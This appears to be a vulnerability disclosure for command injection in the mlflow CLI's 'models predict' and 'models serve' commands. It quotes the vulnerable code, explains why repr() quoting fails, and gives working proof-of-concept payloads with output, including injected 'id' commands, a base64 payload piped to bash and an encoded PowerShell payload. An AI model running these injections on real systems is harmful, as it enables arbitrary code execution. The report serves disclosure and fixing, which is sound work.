The mlflow CLI executable is vulnerable to a command injection attack in the `mlflow models predict` and `mlflow models serve` actions. Both actions are defined in the file `mlflow/models/cli.py` and use the vulnerable `predict` and `serve` methods of a dynamically resolved instance of the `PyFuncBackend` class from the `mlflow/pyfunc/backend.py` file.
`mlflow models predict` command injection

The code of the `PyFuncBackend.predict` method can be seen below:
def predict(self, model_uri, input_path, output_path, content_type):
    """
    Generate predictions using generic python model saved with MLflow. The expected format of
    the input JSON is the Mlflow scoring format.
    Return the prediction results as a JSON.
    """
    local_path = _download_artifact_from_uri(model_uri)
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    local_uri = path_to_local_file_uri(local_path)
    if self._env_manager != _EnvManager.LOCAL:
        command = (
            'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
            "model_uri={model_uri}, "
            "input_path={input_path}, "
            "output_path={output_path}, "
            "content_type={content_type})"
            '"'
        ).format(
            model_uri=repr(local_uri),
            input_path=repr(input_path),
            output_path=repr(output_path),
            content_type=repr(content_type),
        )
        return self.prepare_env(local_path).execute(command)
    else:
        scoring_server._predict(local_uri, input_path, output_path, content_type)
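Why this construction is dangerous can be demonstrated with a minimal, self-contained sketch. The `run_via_shell` helper below is hypothetical and merely stands in for `Environment.execute`, which on Linux ultimately hands the assembled string to `bash -c`:

```python
import subprocess

def run_via_shell(command: str) -> str:
    # Hypothetical stand-in for Environment.execute: on Linux the command
    # string is handed to "bash -c" verbatim, so shell metacharacters in
    # interpolated user input are honored.
    return subprocess.run(
        ["bash", "-c", command], capture_output=True, text=True
    ).stdout

# A benign-looking template with a user-controlled value formatted in via repr().
user_input = 'x"; echo INJECTED; echo "'
command = 'python -c "print({v})"'.format(v=repr(user_input))
output = run_via_shell(command)
print(output)  # stdout contains the result of the injected "echo INJECTED"
```

Because bash re-parses the whole string, the double quote that survives `repr` terminates the `python -c "..."` argument, and everything after the `;` runs as a separate shell command.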
The application dynamically constructs a shell command by injecting the user input into predefined placeholders and passes it to the `mlflow.utils.environment.Environment.execute` method, which essentially runs the newly created console command.

The application uses the built-in Python function `repr` to add quotes around the user input. Nonetheless, `repr` will not prevent an attacker from injecting a double quote into the CLI parameters to escape from the `python -c "..."` argument, as can be seen in the example below:
>>> local_uri='LOCAL_URI'
>>> input_path='INPUT_PATH'
>>> output_path='OUTPUT_PATH'
>>> content_type='injection poc"; we are free now; echo "escape the rest'
>>> command = (
... 'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
... "model_uri={model_uri}, "
... "input_path={input_path}, "
... "output_path={output_path}, "
... "content_type={content_type})"
... '"'
... ).format(
... model_uri=repr(local_uri),
... input_path=repr(input_path),
... output_path=repr(output_path),
... content_type=repr(content_type),
... )
>>> print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"
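For contrast, here is a sketch of how shell-aware quoting with `shlex.quote` would neutralize the same payload. This is an illustrative hardening under the assumption of a POSIX shell, not the fix mlflow shipped:

```python
import shlex

content_type = 'injection poc"; we are free now; echo "escape the rest'

# repr() only adds Python-level quotes; the embedded double quote still
# terminates the surrounding "python -c \"...\"" shell argument.
unsafe = 'python -c "print({v})"'.format(v=repr(content_type))

# shlex.quote() escapes the value for POSIX shells, so the entire
# python -c argument can itself be quoted safely as one token.
code = "print({v})".format(v=repr(content_type))
safe = "python -c {arg}".format(arg=shlex.quote(code))

print(unsafe)
print(safe)
```

Splitting both strings with `shlex.split` shows the difference: the safe form yields exactly three tokens (`python`, `-c`, and the code), while the unsafe form fractures into many tokens at the injected quote.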
Thus, it is possible to inject arbitrary commands into the parameters of the `mlflow models predict` command to achieve unintended code execution.
`mlflow models serve` command injection

The code of the vulnerable `PyFuncBackend.serve` method can be seen below:
def serve(
    self,
    model_uri,
    port,
    host,
    timeout,
    enable_mlserver,
    synchronous=True,
    stdout=None,
    stderr=None,
):  # pylint: disable=W0221
    """
    Serve pyfunc model locally.
    """
    local_path = _download_artifact_from_uri(model_uri)
    server_implementation = mlserver if enable_mlserver else scoring_server
    command, command_env = server_implementation.get_cmd(
        local_path, port, host, timeout, self._nworkers
    )
    ...
    if self._env_manager != _EnvManager.LOCAL:
        return self.prepare_env(local_path).execute(
            command,
            command_env,
            stdout=stdout,
            stderr=stderr,
            preexec_fn=setup_sigterm_on_parent_death,
            synchronous=synchronous,
        )
    else:
        _logger.info("=== Running command '%s'", command)
        if os.name != "nt":
            command = ["bash", "-c", command]
        child_proc = subprocess.Popen(
            command,
            env=command_env,
            preexec_fn=setup_sigterm_on_parent_death,
            stdout=stdout,
            stderr=stderr,
        )
    ...
The above uses the `get_cmd` function, defined in `mlflow/pyfunc/scoring_server/__init__.py`, which formats user input directly into a command string:
def get_cmd(
    model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -> Tuple[str, Dict[str, str]]:
    local_uri = path_to_local_file_uri(model_uri)
    timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    if os.name != "nt":
        args = [f"--timeout={timeout}"]
        if port and host:
            args.append(f"-b {host}:{port}")
        elif host:
            args.append(f"-b {host}")
        if nworkers:
            args.append(f"-w {nworkers}")
        command = (
            f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
            " -- mlflow.pyfunc.scoring_server.wsgi:app"
        )
    else:
        args = []
        if host:
            args.append(f"--host={host}")
        if port:
            args.append(f"--port={port}")
        command = (
            f"waitress-serve {' '.join(args)} "
            "--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
        )
    command_env = os.environ.copy()
    command_env[_SERVER_MODEL_PATH] = local_uri
    return command, command_env
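The lack of quoting can be reproduced with a stripped-down sketch of `get_cmd`'s non-Windows branch. The `build_cmd` function below is a hypothetical simplification for illustration, not mlflow's actual code:

```python
from typing import Optional

def build_cmd(host: str, port: Optional[int] = None, timeout: int = 60) -> str:
    # Simplified sketch of get_cmd's non-Windows branch: the user-controlled
    # host and port are formatted straight into the gunicorn command string
    # without any shell quoting.
    args = [f"--timeout={timeout}"]
    if port and host:
        args.append(f"-b {host}:{port}")
    elif host:
        args.append(f"-b {host}")
    return f"gunicorn {' '.join(args)} -- mlflow.pyfunc.scoring_server.wsgi:app"

command = build_cmd(host="localhost & id & localhost", port=80)
print(command)
```

With `host='localhost & id & localhost'`, the `& id &` sequence survives into the returned string; when that string is later handed to `bash -c`, bash backgrounds the gunicorn invocation and runs `id` as a separate command.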
Install the latest version of mlflow:

pip install mlflow

Install `pyenv` or `conda` (a prerequisite for the `mlflow models predict` command to work with non-local environments).

OR

Clone the mlflow repository into a local directory:

git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts that save a model, e.g. `examples/sklearn_logistic_regression/train.py`, to populate the `mlruns` directory:
cd mlflow/examples/sklearn_logistic_regression
python train.py
List the files inside the `mlruns/0/` directory to get a valid run ID:
ls -l mlruns/0/
total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu 227 Apr 29 19:28 meta.yaml
Insert the below payload into the input path (`-i`), output path (`-o`), or content type (`-t`) parameter:
"; YOUR COMMAND HERE; echo "
For example:
mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
If you want to run more advanced commands that themselves require quotes, you may want to encode your input beforehand.
Injecting advanced payloads for Linux & virtualenv env manager:
# example of encoding a payload that echoes "hello from mlflow rce!" and runs "id" (--env-manager virtualenv)
echo 'echo "hello from mlflow rce!"; id;' | base64
# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=
# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
Injecting advanced payloads for Windows & conda env manager:
# example of encoding a payload to echo "hello from mlflow rce" and run "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw
# encoded payload
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==
# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression>mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
"from
^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce
USER INFORMATION
----------------
User Name SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
DESKTOP-0GD1EQG\docker-users Alias S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Hyper-V Administrators Alias S-1-5-32-578 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
\" ', output_path='test', content_type='json')\"
Insert the command injection payload into the `-h` (`--host`) parameter:
mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'
2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...